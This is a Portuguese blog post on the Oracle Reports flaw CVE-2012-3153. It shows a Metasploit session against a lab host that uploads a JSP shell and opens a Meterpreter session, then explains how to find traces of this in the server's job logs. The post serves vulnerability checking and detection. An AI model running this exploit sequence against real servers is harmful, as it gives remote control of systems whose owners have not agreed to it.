domingo, 16 de fevereiro de 2014

[CVE-2012-3153] Verifique se seu Oracle está vulnerável #InfoSec

Eae Geeks, tenho alguns artigos como rascunho e preciso terminar-lo, alguns são tão antigos que nem vou postar-los mais. Mas enfim, esta postagem será à respeito da Vulnerabilidades em Oracle Server, na qual foi assunto da postagem anterior.


A partir deste interessante tweet, decidi compartilhar-lo no meu blog também. O link do tweet o levará à postagem original.

Dana Taylor, a mesma quem reportou a crítica falha do servidor Oracle, fez uma interessante postagem mostrando como verificar se esta falha afeta no seu Oracle. Para isso foi usado um módulo do Metasploit.
Referência: https://github.com/rapid7/metasploit-framework/pull/2931

Resultado da ação:

msf > use exploit/multi/http/oracle2
msf exploit(oracle2) > set RHOST xp
RHOST => xp
msf exploit(oracle2) > set RPORT 8889
RPORT => 8889
msf exploit(oracle2) > set TARGET 1
TARGET => 1
msf exploit(oracle2) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(oracle2) > check
[+] xp:8889 – Windows install detected
[*] xp:8889 – Path: DevSuiteHome_1/reports/j2ee/reports_ids/web
[+] xp:8889 – URLPARAMETER is vulnerable
[*] xp:8889 – The target appears to be vulnerable.
msf exploit(oracle2) > exploit
[*] xp:8889 – Querying showenv!
[*] Started bind handler
[+] xp:8889 – Query succeeded!
[*] xp:8889 – Windows install detected
[*] xp:8889 – Path: DevSuiteHome_1/reports/j2ee/reports_ids/web
[*] xp:8889 – Hosting payload locally …
[*] Using URL: http://0.0.0.0:8080/E7cCTp
[*] Local IP: http://192.168.1.91:8080/E7cCTp
[*] Server started.
[*] xp:8889 – Building JSP shell …
[*] xp:8889 – Adjusting shell due to payload size
[*] xp:8889 – Uploading payload …
[+] xp:8889 – Payload hopefully uploaded!
[*] xp:8889 – Our payload is at: /reports/images/kCHVUBiBzflwILK.jsp
[*] xp:8889 – Executing payload…
[+] xp:8889 – Payload executed!
[*] Sending stage (769024 bytes) to xp
[*] Meterpreter session 1 opened (192.168.1.91:53796 -> 192.168.1.102:4444) at 2014-02-16 12:22:22 -0500
[*] Server stopped.
meterpreter > getuid
Server username: XP\IEUser

Entre na URL na qual foi testada para averiguar a falha, neste caso...
http://xp:8889/reports/rwservlet/showjobs

Atrávez do 'showjobs', será mostrado as últimas 1000 ações realizadas (Clique na imagem para melhor visualização):

Analisou bem a imagem? Note que o OutputName do JobID 133, perceba que é a mesma URL mostrada pelo Metasploit na ação de upload do payload. Vendo mais afundo, observe as seguintes IDs 132 e 133:

http://xp:8889/reports/rwservlet/getjobid132

http://xp:8889/reports/rwservlet/getjobid133


No ID 132, significa que está sendo checado se o URLPARAMETER está vulnerável, caso esteja, será feito o upload do PAYLOAD ( neste caso, é o que mostra o Get Job ID 133). Então já sabe, se isto apareceu para você significa que sua database está vulnerável.

Nenhum comentário:

Postar um comentário